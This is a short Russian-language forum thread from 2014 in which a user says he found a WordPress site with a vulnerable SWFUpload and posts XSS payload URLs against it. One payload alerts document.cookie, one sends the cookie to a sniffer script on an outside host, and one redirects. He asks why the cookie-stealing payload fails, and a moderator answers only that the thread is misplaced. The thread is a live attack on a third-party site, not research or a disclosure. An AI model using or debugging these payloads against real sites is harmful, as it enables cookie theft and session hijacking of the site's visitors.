Использование XSS SWFUpload

Discussion in 'Песочница' started by agentru, 25 Feb 2014.

Thread Status:
Not open for further replies.
  1. agentru

    agentru New Member

    Joined:
    4 Dec 2010
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    Нашел сайт на вордпрессе, где стоит уязвимый SWFUpload.
    Алерт отлично отрабатывает:
    http://***.ru/wp-includes/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

    Но когда, я пытаюсь подставить вызов сниффера, скрипт не отрабатывает:
    http://***.ru/wp-includes/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!img=new Image();img.src='http://***.ru/s.php?cookie='+document.cookie;//

    Даже банальная переадресация, также не отрабатывает:
    http://***.ru/wp-includes/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!location='http://www.example.ru';//

    Подскажите пожалуйста, в чем может быть причина?
     
  2. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    наверное вопрос не в той теме создан...
     
    _________________________
Thread Status:
Not open for further replies.